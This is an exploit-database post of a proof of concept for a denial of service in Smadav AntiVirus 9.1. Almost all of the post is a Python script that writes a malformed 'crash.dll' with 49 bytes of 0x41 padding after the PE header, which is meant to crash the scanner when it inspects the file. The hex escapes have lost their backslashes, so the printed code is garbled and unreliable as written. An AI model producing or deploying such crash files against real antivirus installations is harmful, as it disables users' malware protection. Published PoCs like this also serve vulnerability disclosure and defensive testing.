Home / exploits Smadav AntiVirus 9.1 Denial Of Service
Posted on 13 November 2012
# Exploit Title: Smadav AntiVirus - Crash PoC # Date: 10/Nov/2012 # Exploit Author: Mada R Perdhana (mada@spentera.com) / Spentera Research Team # Vendor Homepage: http://www.smadav.net & http://www.smadav.web.id # Software Link: http://www.smadav.net/download # Version: 9.1 (Lastest Version, should be affected previous version) # Tested on: Windows XP SP 2 The product will be crash when scanning a malicious .dll generate using this script ----python-- file = open("crash.dll","wb") file.write("x4dx5ax90x00x03x00x00x00x04x00x00x00xffxffx00x00xb8x41x41x41x41x41x41x41x40x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xf0x00x00x00x0ex1fxbax0ex00xb4x09xcdx21xb8x01x4cxcdx21x54x68x69x73x20x70x72x6fx67x72x61x6dx20x63x61x6ex6ex6fx74x20x62x65x20x72x75x6ex20x69x6ex20x44x4fx53x20x6dx6fx64x65x2ex0dx0dx0ax24x00x00x00x00x00x00x00x8cx9cx76x90xc8xfdx18xc3xc8xfdx18xc3xc8xfdx18xc3x4bxf5x45xc3xcbxfdx18xc3xc8xfdx19xc3x53xfdx18xc3x46xeax78xc3xdfxfdx18xc3x46xeax17xc3x85xfdx18xc3x46xeax47xc3xc7xffx18xc3x46xeax44xc3xc9xfdx18xc3x46xeax46xc3xc9xfdx18xc3x46xeax42xc3xc9xfdx18xc3x52x69x63x68xc8xfdx18xc3x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x50x45x00x00x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41") file.close() ------- The trick is by adding 49 bytes of malicious byte (represent with x41) into the .dll file, right after the PE (x50x45) header on the 244th byte of the file.
